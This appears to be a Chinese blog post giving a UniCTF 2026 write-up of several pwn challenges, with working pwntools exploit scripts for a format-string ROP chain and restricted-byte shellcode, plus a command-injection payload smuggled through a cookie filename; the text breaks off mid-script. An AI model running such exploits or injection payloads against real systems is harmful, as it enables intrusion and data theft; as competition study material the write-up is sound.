<!doctype html>
<html lang="zh-CN">
  <head>
    
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="theme-color" content="#6d5dfc">
<title>UniCTF 2026 WP · Auceptin&#39;s Blog</title>
<meta name="description" content="Auceptin 的个人博客">
<link rel="canonical" href="https://aucept.in/2026/02/03/UniCTF/">
<link rel="icon" type="image/png" href="/icon.png">
<link rel="apple-touch-icon" href="/icon.png">
<link rel="alternate" type="application/atom+xml" title="Auceptin&#39;s Blog" href="/atom.xml">
<meta property="og:type" content="article">
<meta property="og:title" content="UniCTF 2026 WP · Auceptin&#39;s Blog">
<meta property="og:description" content="Auceptin 的个人博客">
<meta property="og:url" content="https://aucept.in/2026/02/03/UniCTF/">
<meta property="og:image" content="https://aucept.in/image/cover48_shooting_star.jpg">
<script>
  (function () {
    try {
      var saved = localStorage.getItem('shileyuan-color-scheme') || localStorage.getItem('aurora-color-scheme');
      if (saved) localStorage.setItem('shileyuan-color-scheme', saved);
      var dark = saved ? saved === 'dark' : window.matchMedia('(prefers-color-scheme: dark)').matches;
      document.documentElement.dataset.theme = dark ? 'dark' : 'light';

    } catch (error) {}
  })();
</script>
<style>:root { --accent: #6d5dfc; }</style>
<link rel="stylesheet" href="/css/style.css">
<style id="shileyuan-mutable-css">
  body { --scene: 1; }
  body.is-home { --accent: #6d5dfc; }
  .hero-copy h1 em, .home-hero .eyebrow { color: var(--accent); }
  .home-hero .button.primary { background: var(--accent); }
  .hero-copy h1 { letter-spacing: -0.055em; }
  .post-card { border-radius: 22px; }
  .post-grid { gap: 24px; }
  .site-header, .live-css-token { backdrop-filter: blur(22px); }
  .avatar-wrap { rotate: 3deg; }
  .avatar-wrap img { filter: saturate(1.08); }
  .orbit { border-style: dashed; }
</style>

  <meta name="generator" content="Hexo 7.3.0"></head>
  <body class="is-post">
    <div class="reading-progress" aria-hidden="true"><span id="reading-progress-bar"></span></div>
    <header class="site-header" id="site-header">
  <div class="header-inner">
    <a class="brand" href="/" aria-label="Auceptin&#39;s Blog 首页">
      <span class="brand-mark"><img src="/icon.png" alt=""></span>
      <span class="brand-text">Auceptin&#39;s Blog</span>
    </a>

    <button class="nav-toggle" id="nav-toggle" type="button" aria-expanded="false" aria-controls="site-nav">
      <span></span><span></span><span></span><span class="sr-only">打开导航</span>
    </button>

    <nav class="site-nav" id="site-nav" aria-label="主导航">
      
        
        <a class="nav-link " href="/">首页</a>
      
        
        <a class="nav-link " href="/archives/">归档</a>
      
        
        <a class="nav-link " href="/categories/">分类</a>
      
        
        <a class="nav-link " href="/tags/">标签</a>
      
        
        <a class="nav-link " href="/friends/">友链</a>
      
      <button class="theme-toggle" id="theme-toggle" type="button" aria-label="切换深色模式">
        <span class="theme-icon-light">☀</span><span class="theme-icon-dark">☾</span>
      </button>
    </nav>
  </div>
</header>


    <main class="site-main">
      
<article class="article-shell">
  <header class="article-hero has-cover" style="--cover-image: url('/image/cover2_square.png')">
    <div class="article-hero-overlay"></div>
    <div class="article-hero-inner">
      <h1>UniCTF 2026 WP</h1>
      <div class="post-meta light-meta article-hero-meta">
        <span>发表于<time datetime="2026-02-03T02:00:17.000Z">2026-02-03</time></span>
        <span aria-hidden="true">|</span>
        <span>更新于<time datetime="2026-07-17T07:53:25.447Z">2026-07-17</time></span>
        <span aria-hidden="true">|</span><a href="/categories/ctf/">ctf</a>
      </div>
    </div>
  </header>

  <div class="article-layout">
    <div class="article-container">
      <div class="article-content" id="article-content"><p>为期一周，中间夹杂着其他的事，做得蛮累的</p>
<h2 id="什么？我不是汇编高手吗？">什么？我不是汇编高手吗？</h2>
<p>将输入指令以四字节为单位，用0xE9分割后执行</p>
<p>0xE9对应的汇编是短距离jmp，将后续四字节识别为偏移，然后跳转到rip + offset + 5的地址继续执行</p>
<p>精确计算的offset可以跳转到自定义四字节的开头，所以理论上可以任意不超过4字节汇编指令执行</p>
<p>没有PIE有后门函数，思路是将函数地址写入rax然后call rax，其中向rax写入地址需要拆成多步完成</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">def</span> <span class="token function">add</span><span class="token punctuation">(</span>content<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">global</span> payload
    payload <span class="token operator">+=</span> p32<span class="token punctuation">(</span><span class="token number">0x1</span><span class="token punctuation">)</span>
    payload <span class="token operator">+=</span> content

add<span class="token punctuation">(</span>p32<span class="token punctuation">(</span><span class="token number">0x406a9090</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
add<span class="token punctuation">(</span>p32<span class="token punctuation">(</span><span class="token number">0x58909090</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
add<span class="token punctuation">(</span>p32<span class="token punctuation">(</span><span class="token number">0x9010e0c1</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
add<span class="token punctuation">(</span>p32<span class="token punctuation">(</span><span class="token number">0x12110566</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
add<span class="token punctuation">(</span>p32<span class="token punctuation">(</span><span class="token number">0x9090d0ff</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>执行时像这样：</p>
<pre class="line-numbers language-text" data-language="text"><code class="language-text">► 0x7c778587d000    jmp    0x7c778587d006              &lt;0x7c778587d006>
   ↓
  0x7c778587d006    nop
  0x7c778587d007    nop
  0x7c778587d008    push   0x40
  0x7c778587d00a    jmp    0x7c778587d010              &lt;0x7c778587d010>
   ↓
  0x7c778587d010    nop
  0x7c778587d011    nop
  0x7c778587d012    nop
  0x7c778587d013    pop    rax      RAX => 0x40
  0x7c778587d014    jmp    0x7c778587d01a              &lt;0x7c778587d01a>
   ↓
  0x7c778587d01a    shl    eax, 0x10
  0x7c778587d01d    nop
  0x7c778587d01e    jmp    0x7c778587d024              &lt;0x7c778587d024>
   ↓
  0x7c778587d024    add    ax, 0x1211     AX => 0x1211 (0x0 + 0x1211)
  0x7c778587d028    jmp    0x7c778587d02e              &lt;0x7c778587d02e>
   ↓
  0x7c778587d02e    call   rax                         &lt;getshell+27><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h2 id="Uni-check">Uni_check</h2>
<p>一个go语言写的服务器，有两个功能，下载和检查</p>
<p>程序会在当前目录下存储cookie文件，可以自己指定内容（cookie文件名），检查功能会扫描文件内容是否合规，对于不合规的会执行删除，这里的逻辑是<br>
<code>delete_cmd = f&quot;rm -f &#123;self.base_dir&#125;/&#123;fname&#125;&quot;</code></p>
<p>删除指令是直接拼接的，于是通过<code>;``&amp;&amp;</code>一类的符号实现命令注入</p>
<p>还有go语言处理路径的问题，可以用<code>../</code>把文件写入上级目录</p>
<p>利用的思路是cat /flag到当前文件夹，然后下载下来的文件里就包含了flag，但是flag在根目录，有些字符如<code>/</code>是不能出现在文件名里的</p>
<p>最终的利用命令如下：<br>
<code>curl -v -b &quot;session=../test.txt&amp;&amp;echo Y2F0IC9mbGFnID4gZmxhZ19vdXQ=|base64 -d|sh;.txt&quot; http://nc1.ctfplus.cn:port</code></p>
<h2 id="speak">speak</h2>
<p>沙箱环境的格式化字符串，前期比较正常一次泄露一次足够长的篡改，但是输出后直接用syscall退出，所以只好篡改printf的返回地址然后打orw</p>
<p>rop链是放在栈上的，需要利用一次栈迁移把返回地址改到rop链的开头，把返回地址放栈上，内容指向leave ret再改对应的rbp：</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>

context<span class="token punctuation">(</span>arch<span class="token operator">=</span><span class="token string">"amd64"</span><span class="token punctuation">,</span> os<span class="token operator">=</span><span class="token string">"linux"</span><span class="token punctuation">,</span> log_level<span class="token operator">=</span><span class="token string">"debug"</span><span class="token punctuation">,</span> terminal<span class="token operator">=</span><span class="token punctuation">[</span><span class="token string">"tmux"</span><span class="token punctuation">,</span> <span class="token string">"splitw"</span><span class="token punctuation">,</span> <span class="token string">"-h"</span><span class="token punctuation">]</span><span class="token punctuation">)</span>

elf <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">"./pwn"</span><span class="token punctuation">)</span>
libc <span class="token operator">=</span> ELF<span class="token punctuation">(</span><span class="token string">"./libc.so.6"</span><span class="token punctuation">)</span>
<span class="token comment">#p = process("./pwn")</span>
p <span class="token operator">=</span> remote<span class="token punctuation">(</span><span class="token string">"nc1.ctfplus.cn"</span> <span class="token punctuation">,</span><span class="token number">23124</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"name:"</span><span class="token punctuation">)</span>

leak_payload <span class="token operator">=</span> <span class="token string">b"aaaabbbbccccddddeeeeffffgggghhhh%2$p %9$p %63$p?"</span>
p<span class="token punctuation">.</span>send<span class="token punctuation">(</span>leak_payload<span class="token punctuation">)</span>

output <span class="token operator">=</span> p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"?"</span><span class="token punctuation">)</span>
cleaned <span class="token operator">=</span> output<span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">b"(nil)"</span><span class="token punctuation">,</span> <span class="token string">b"0x0"</span><span class="token punctuation">)</span><span class="token punctuation">.</span>strip<span class="token punctuation">(</span><span class="token string">b"? \n"</span><span class="token punctuation">)</span>
parts <span class="token operator">=</span> cleaned<span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token punctuation">)</span>

leaked_libc <span class="token operator">=</span> <span class="token builtin">int</span><span class="token punctuation">(</span>parts<span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token number">16</span><span class="token punctuation">)</span>
leaked_stack <span class="token operator">=</span> <span class="token builtin">int</span><span class="token punctuation">(</span>parts<span class="token punctuation">[</span><span class="token number">1</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token number">16</span><span class="token punctuation">)</span>
leaked_text <span class="token operator">=</span> <span class="token builtin">int</span><span class="token punctuation">(</span>parts<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token number">16</span><span class="token punctuation">)</span>

printf_ret <span class="token operator">=</span> leaked_stack <span class="token operator">-</span> <span class="token number">0x6B8</span> <span class="token operator">+</span> <span class="token number">0x5D8</span>
buffer_addr <span class="token operator">=</span> leaked_stack <span class="token operator">-</span> <span class="token number">0xc8</span>

libc_base <span class="token operator">=</span> leaked_libc <span class="token operator">-</span> <span class="token number">0x804643</span> <span class="token operator">+</span> <span class="token number">0x660100</span> <span class="token operator">-</span> libc<span class="token punctuation">.</span>symbols<span class="token punctuation">[</span><span class="token string">"printf"</span><span class="token punctuation">]</span>
leaked_main <span class="token operator">=</span> leaked_text <span class="token operator">-</span> <span class="token number">0x7d60</span> <span class="token operator">+</span> <span class="token number">0x53dd</span>  
libc<span class="token punctuation">.</span>address <span class="token operator">=</span> libc_base
elf_base <span class="token operator">=</span> leaked_main <span class="token operator">-</span> elf<span class="token punctuation">.</span>symbols<span class="token punctuation">[</span><span class="token string">"main"</span><span class="token punctuation">]</span>
elf<span class="token punctuation">.</span>address <span class="token operator">=</span> elf_base
printf_addr <span class="token operator">=</span> leaked_main <span class="token operator">-</span> <span class="token number">0x3dd</span> <span class="token operator">+</span> <span class="token number">0x4af</span>
again_addr <span class="token operator">=</span> leaked_main <span class="token operator">-</span> <span class="token number">0x3dd</span> <span class="token operator">+</span> <span class="token number">0x496</span>

rop_libc <span class="token operator">=</span> ROP<span class="token punctuation">(</span>libc<span class="token punctuation">)</span>
pop_rdi <span class="token operator">=</span> rop_libc<span class="token punctuation">.</span>find_gadget<span class="token punctuation">(</span><span class="token punctuation">[</span><span class="token string">"pop rdi"</span><span class="token punctuation">,</span> <span class="token string">"ret"</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">.</span>address
pop_rsi <span class="token operator">=</span> rop_libc<span class="token punctuation">.</span>find_gadget<span class="token punctuation">(</span><span class="token punctuation">[</span><span class="token string">"pop rsi"</span><span class="token punctuation">,</span> <span class="token string">"ret"</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">.</span>address
pop_rbp <span class="token operator">=</span> rop_libc<span class="token punctuation">.</span>find_gadget<span class="token punctuation">(</span><span class="token punctuation">[</span><span class="token string">"pop rbp"</span><span class="token punctuation">,</span> <span class="token string">"ret"</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">.</span>address
pop_rdx_leave <span class="token operator">=</span> rop_libc<span class="token punctuation">.</span>find_gadget<span class="token punctuation">(</span><span class="token punctuation">[</span><span class="token string">"pop rdx"</span><span class="token punctuation">,</span> <span class="token string">"leave"</span><span class="token punctuation">,</span> <span class="token string">"ret"</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">.</span>address

pop_rdx_g <span class="token operator">=</span> pop_rdx_leave
pop_rdx_extra <span class="token operator">=</span> <span class="token number">0x0</span> 
rop_elf <span class="token operator">=</span> ROP<span class="token punctuation">(</span>elf<span class="token punctuation">)</span>
leave_ret <span class="token operator">=</span> rop_elf<span class="token punctuation">.</span>find_gadget<span class="token punctuation">(</span><span class="token punctuation">[</span><span class="token string">"leave"</span><span class="token punctuation">,</span> <span class="token string">"ret"</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">.</span>address

open_addr <span class="token operator">=</span> libc<span class="token punctuation">.</span>symbols<span class="token punctuation">[</span><span class="token string">"open"</span><span class="token punctuation">]</span>
read_addr <span class="token operator">=</span> libc<span class="token punctuation">.</span>symbols<span class="token punctuation">[</span><span class="token string">"read"</span><span class="token punctuation">]</span>
write_addr <span class="token operator">=</span> libc<span class="token punctuation">.</span>symbols<span class="token punctuation">[</span><span class="token string">"write"</span><span class="token punctuation">]</span>

bss_addr <span class="token operator">=</span> elf<span class="token punctuation">.</span>bss<span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token number">0x800</span>

rop_offset <span class="token operator">=</span> <span class="token number">0x60</span>
fake_rbp <span class="token operator">=</span> buffer_addr <span class="token operator">+</span> rop_offset <span class="token operator">-</span> <span class="token number">0x10</span>

writes <span class="token operator">=</span> <span class="token punctuation">&#123;</span>printf_ret <span class="token operator">-</span> <span class="token number">8</span><span class="token punctuation">:</span> p16<span class="token punctuation">(</span>fake_rbp <span class="token operator">&amp;</span> <span class="token number">0xFFFF</span><span class="token punctuation">)</span><span class="token punctuation">,</span> printf_ret<span class="token punctuation">:</span> p16<span class="token punctuation">(</span>leave_ret <span class="token operator">&amp;</span> <span class="token number">0xFFFF</span><span class="token punctuation">)</span><span class="token punctuation">&#125;</span>
fmt_payload <span class="token operator">=</span> fmtstr_payload<span class="token punctuation">(</span><span class="token number">6</span><span class="token punctuation">,</span> writes<span class="token punctuation">,</span> write_size<span class="token operator">=</span><span class="token string">"short"</span><span class="token punctuation">,</span> strategy<span class="token operator">=</span><span class="token string">"fast"</span><span class="token punctuation">)</span>
fmt_payload <span class="token operator">=</span> fmt_payload<span class="token punctuation">.</span>ljust<span class="token punctuation">(</span>rop_offset<span class="token punctuation">,</span> <span class="token string">b"A"</span><span class="token punctuation">)</span>

stage1 <span class="token operator">=</span> p64<span class="token punctuation">(</span>bss_addr<span class="token punctuation">)</span> <span class="token comment">#buffer_addr + 0x50</span>
stage1 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>pop_rdi<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>buffer_addr <span class="token operator">+</span> <span class="token number">0x100</span> <span class="token operator">-</span> <span class="token number">0x28</span><span class="token punctuation">)</span>
stage1 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>pop_rsi<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span>
stage1 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>open_addr<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>pop_rdi<span class="token punctuation">)</span> <span class="token comment"># 执行到open时，rdx为0，不用设置，返回值（文件描述符为3）</span>
stage1 <span class="token operator">+=</span> p64<span class="token punctuation">(</span><span class="token number">3</span><span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>pop_rsi<span class="token punctuation">)</span>
stage1 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>bss_addr<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>pop_rbp<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>buffer_addr <span class="token operator">+</span> <span class="token number">0x100</span> <span class="token operator">-</span> <span class="token number">0x40</span><span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>pop_rdx_leave<span class="token punctuation">)</span>
stage1 <span class="token operator">+=</span> p64<span class="token punctuation">(</span><span class="token number">0x100</span><span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>bss_addr <span class="token operator">+</span> <span class="token number">0x110</span><span class="token punctuation">)</span>
stage1 <span class="token operator">+=</span> p64<span class="token punctuation">(</span>read_addr<span class="token punctuation">)</span> <span class="token operator">+</span> p64<span class="token punctuation">(</span>printf_addr<span class="token punctuation">)</span>
stage1 <span class="token operator">+=</span> <span class="token string">b"./flag\x00"</span>   <span class="token comment">#到0x100</span>


payload <span class="token operator">=</span> fmt_payload <span class="token operator">+</span> stage1
<span class="token keyword">if</span> <span class="token builtin">len</span><span class="token punctuation">(</span>payload<span class="token punctuation">)</span> <span class="token operator">></span> <span class="token number">0x100</span><span class="token punctuation">:</span>
    <span class="token keyword">raise</span> ValueError<span class="token punctuation">(</span><span class="token string">"stage1 payload exceeds 0x100"</span><span class="token punctuation">)</span>

<span class="token comment">#gdb.attach(p)</span>
p<span class="token punctuation">.</span>send<span class="token punctuation">(</span>payload<span class="token punctuation">)</span>

log<span class="token punctuation">.</span>success<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"buffer addr</span><span class="token interpolation"><span class="token punctuation">&#123;</span><span class="token builtin">hex</span><span class="token punctuation">(</span>buffer_addr<span class="token punctuation">)</span><span class="token punctuation">&#125;</span></span><span class="token string">"</span></span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>格式化字符串还是一如既往地繁琐</p>
<h2 id="smcode">smcode</h2>
<p>任意输入执行，但是只能用斐波那契数列里的字节</p>
<p>光靠这些字节对应的指令肯定是无法getshell的，思路是借助al寄存器修改已写入的内容，动态构建出一些指令，最终来一个真正的任意读</p>
<p>GPT5.2给出了用于动态构建命令的神奇函数，由于是利用al完成所以如果拼出的指令对它有影响就会乱掉，好在本题只要触发read就好，可以手调</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span>

context<span class="token punctuation">(</span>arch<span class="token operator">=</span><span class="token string">"amd64"</span><span class="token punctuation">,</span> os<span class="token operator">=</span><span class="token string">"linux"</span><span class="token punctuation">,</span> log_level<span class="token operator">=</span><span class="token string">"debug"</span><span class="token punctuation">,</span> terminal<span class="token operator">=</span><span class="token punctuation">[</span><span class="token string">"tmux"</span><span class="token punctuation">,</span> <span class="token string">"splitw"</span><span class="token punctuation">,</span> <span class="token string">"-h"</span><span class="token punctuation">]</span><span class="token punctuation">)</span>

<span class="token comment">#p = process("./pwn")</span>
p <span class="token operator">=</span> remote<span class="token punctuation">(</span><span class="token string">"nc1.ctfplus.cn"</span><span class="token punctuation">,</span><span class="token number">42376</span><span class="token punctuation">)</span>
p<span class="token punctuation">.</span>recvuntil<span class="token punctuation">(</span><span class="token string">b"Input your shellcode"</span><span class="token punctuation">)</span>

ALLOWED <span class="token operator">=</span> <span class="token punctuation">&#123;</span><span class="token number">0x00</span><span class="token punctuation">,</span> <span class="token number">0x01</span><span class="token punctuation">,</span> <span class="token number">0x02</span><span class="token punctuation">,</span> <span class="token number">0x03</span><span class="token punctuation">,</span> <span class="token number">0x05</span><span class="token punctuation">,</span> <span class="token number">0x08</span><span class="token punctuation">,</span> <span class="token number">0x0D</span><span class="token punctuation">,</span> <span class="token number">0x15</span><span class="token punctuation">,</span> <span class="token number">0x22</span><span class="token punctuation">,</span> <span class="token number">0x37</span><span class="token punctuation">,</span> <span class="token number">0x59</span><span class="token punctuation">,</span> <span class="token number">0x90</span><span class="token punctuation">,</span> <span class="token number">0xE9</span><span class="token punctuation">&#125;</span>
ALLOWED_ADD <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token number">0xE9</span><span class="token punctuation">,</span> <span class="token number">0x90</span><span class="token punctuation">,</span> <span class="token number">0x59</span><span class="token punctuation">,</span> <span class="token number">0x37</span><span class="token punctuation">,</span> <span class="token number">0x22</span><span class="token punctuation">,</span> <span class="token number">0x15</span><span class="token punctuation">,</span> <span class="token number">0x0D</span><span class="token punctuation">,</span> <span class="token number">0x08</span><span class="token punctuation">,</span> <span class="token number">0x05</span><span class="token punctuation">,</span> <span class="token number">0x03</span><span class="token punctuation">,</span> <span class="token number">0x02</span><span class="token punctuation">,</span> <span class="token number">0x01</span><span class="token punctuation">]</span>

READ_N <span class="token operator">=</span> <span class="token number">0x59</span>

<span class="token keyword">def</span> <span class="token function">add_eax_imm8</span><span class="token punctuation">(</span>v<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">assert</span> v <span class="token keyword">in</span> ALLOWED
    <span class="token keyword">return</span> <span class="token string">b"\x05"</span> <span class="token operator">+</span> <span class="token builtin">bytes</span><span class="token punctuation">(</span><span class="token punctuation">[</span>v<span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">b"\x00\x00\x00"</span>


<span class="token keyword">def</span> <span class="token function">reach_al</span><span class="token punctuation">(</span>cur<span class="token punctuation">,</span> target<span class="token punctuation">)</span><span class="token punctuation">:</span>
    diff <span class="token operator">=</span> <span class="token punctuation">(</span>target <span class="token operator">-</span> cur<span class="token punctuation">)</span> <span class="token operator">&amp;</span> <span class="token number">0xFF</span>
    seq <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token punctuation">]</span>
    <span class="token keyword">for</span> v <span class="token keyword">in</span> ALLOWED_ADD<span class="token punctuation">:</span>
        <span class="token keyword">while</span> diff <span class="token operator">>=</span> v<span class="token punctuation">:</span>
            seq<span class="token punctuation">.</span>append<span class="token punctuation">(</span>v<span class="token punctuation">)</span>
            diff <span class="token operator">-=</span> v
    out <span class="token operator">=</span> <span class="token string">b""</span><span class="token punctuation">.</span>join<span class="token punctuation">(</span>add_eax_imm8<span class="token punctuation">(</span>x<span class="token punctuation">)</span> <span class="token keyword">for</span> x <span class="token keyword">in</span> seq<span class="token punctuation">)</span>
    <span class="token keyword">return</span> out<span class="token punctuation">,</span> target


<span class="token keyword">def</span> <span class="token function">patch_and_exec_base</span><span class="token punctuation">(</span>base<span class="token operator">=</span><span class="token number">0x90</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">assert</span> base <span class="token keyword">in</span> ALLOWED
    <span class="token keyword">return</span> <span class="token string">b"\x00\x05\x05\x00\x00\x00"</span> <span class="token operator">+</span> <span class="token string">b"\xE9\x00\x00\x00\x00"</span> <span class="token operator">+</span> <span class="token builtin">bytes</span><span class="token punctuation">(</span><span class="token punctuation">[</span>base<span class="token punctuation">]</span><span class="token punctuation">)</span>


<span class="token keyword">def</span> <span class="token function">emit_exec_opcode</span><span class="token punctuation">(</span>cur_al<span class="token punctuation">,</span> opcode_byte<span class="token punctuation">,</span> follow<span class="token operator">=</span><span class="token string">b""</span><span class="token punctuation">,</span> base<span class="token operator">=</span><span class="token number">0x90</span><span class="token punctuation">,</span> post_al<span class="token operator">=</span><span class="token boolean">None</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    need_al <span class="token operator">=</span> <span class="token punctuation">(</span>opcode_byte <span class="token operator">-</span> base<span class="token punctuation">)</span> <span class="token operator">&amp;</span> <span class="token number">0xFF</span>
    adj<span class="token punctuation">,</span> cur_al <span class="token operator">=</span> reach_al<span class="token punctuation">(</span>cur_al<span class="token punctuation">,</span> need_al<span class="token punctuation">)</span>
    out <span class="token operator">=</span> adj <span class="token operator">+</span> patch_and_exec_base<span class="token punctuation">(</span>base<span class="token operator">=</span>base<span class="token punctuation">)</span> <span class="token operator">+</span> follow
    <span class="token keyword">if</span> post_al <span class="token keyword">is</span> <span class="token keyword">not</span> <span class="token boolean">None</span><span class="token punctuation">:</span>
        cur_al <span class="token operator">=</span> post_al <span class="token operator">&amp;</span> <span class="token number">0xFF</span>
    <span class="token keyword">return</span> out<span class="token punctuation">,</span> cur_al


<span class="token keyword">def</span> <span class="token function">emit_push_imm8</span><span class="token punctuation">(</span>cur_al<span class="token punctuation">,</span> imm8<span class="token punctuation">)</span><span class="token punctuation">:</span>
    out<span class="token punctuation">,</span> cur_al <span class="token operator">=</span> emit_exec_opcode<span class="token punctuation">(</span>cur_al<span class="token punctuation">,</span> <span class="token number">0x6A</span><span class="token punctuation">)</span>
    out <span class="token operator">+=</span> <span class="token builtin">bytes</span><span class="token punctuation">(</span><span class="token punctuation">[</span>imm8<span class="token punctuation">]</span><span class="token punctuation">)</span>
    <span class="token keyword">return</span> out<span class="token punctuation">,</span> cur_al


<span class="token keyword">def</span> <span class="token function">emit_pop</span><span class="token punctuation">(</span>cur_al<span class="token punctuation">,</span> reg_pop_opcode<span class="token punctuation">,</span> post_al<span class="token operator">=</span><span class="token boolean">None</span><span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">return</span> emit_exec_opcode<span class="token punctuation">(</span>cur_al<span class="token punctuation">,</span> reg_pop_opcode<span class="token punctuation">,</span> post_al<span class="token operator">=</span>post_al<span class="token punctuation">)</span>


<span class="token keyword">def</span> <span class="token function">pick_disp_at_least</span><span class="token punctuation">(</span>min_len<span class="token punctuation">)</span><span class="token punctuation">:</span>
    cands <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token number">0x00</span><span class="token punctuation">,</span> <span class="token number">0x01</span><span class="token punctuation">,</span> <span class="token number">0x02</span><span class="token punctuation">,</span> <span class="token number">0x03</span><span class="token punctuation">,</span> <span class="token number">0x05</span><span class="token punctuation">,</span> <span class="token number">0x08</span><span class="token punctuation">,</span> <span class="token number">0x0D</span><span class="token punctuation">,</span> <span class="token number">0x15</span><span class="token punctuation">,</span> <span class="token number">0x22</span><span class="token punctuation">,</span> <span class="token number">0x37</span><span class="token punctuation">,</span> <span class="token number">0x59</span><span class="token punctuation">,</span> <span class="token number">0x90</span><span class="token punctuation">,</span> <span class="token number">0xE9</span><span class="token punctuation">]</span>
    <span class="token keyword">for</span> d <span class="token keyword">in</span> cands<span class="token punctuation">:</span>
        <span class="token keyword">if</span> d <span class="token operator">>=</span> min_len<span class="token punctuation">:</span>
            <span class="token keyword">return</span> d
    <span class="token keyword">return</span> <span class="token number">0xE9</span>


cur_al <span class="token operator">=</span> <span class="token number">0</span>
stage1 <span class="token operator">=</span> <span class="token string">b""</span>

<span class="token comment"># rsi = rbx</span>
chunk<span class="token punctuation">,</span> cur_al <span class="token operator">=</span> emit_exec_opcode<span class="token punctuation">(</span>cur_al<span class="token punctuation">,</span> <span class="token number">0x53</span><span class="token punctuation">)</span>  <span class="token comment"># push rbx</span>
stage1 <span class="token operator">+=</span> chunk
chunk<span class="token punctuation">,</span> cur_al <span class="token operator">=</span> emit_exec_opcode<span class="token punctuation">(</span>cur_al<span class="token punctuation">,</span> <span class="token number">0x5E</span><span class="token punctuation">)</span>  <span class="token comment"># pop rsi</span>
stage1 <span class="token operator">+=</span> chunk

<span class="token comment"># rdx = READ_N (push imm8 会符号扩展，所以 imm8 必须 &lt; 0x80)</span>
chunk<span class="token punctuation">,</span> cur_al <span class="token operator">=</span> emit_push_imm8<span class="token punctuation">(</span>cur_al<span class="token punctuation">,</span> READ_N<span class="token punctuation">)</span>
stage1 <span class="token operator">+=</span> chunk
chunk<span class="token punctuation">,</span> cur_al <span class="token operator">=</span> emit_pop<span class="token punctuation">(</span>cur_al<span class="token punctuation">,</span> <span class="token number">0x5A</span><span class="token punctuation">)</span>  <span class="token comment"># pop rdx</span>
stage1 <span class="token operator">+=</span> chunk

<span class="token comment"># 设置 AL=2，用于把后面的 0D patch 成 0F</span>
adj<span class="token punctuation">,</span> cur_al <span class="token operator">=</span> reach_al<span class="token punctuation">(</span>cur_al<span class="token punctuation">,</span> <span class="token number">0x02</span><span class="token punctuation">)</span>
stage1 <span class="token operator">+=</span> adj

<span class="token comment"># 预计算：push 0; pop rax（pop rax 后 AL=0）</span>
late <span class="token operator">=</span> <span class="token string">b""</span>
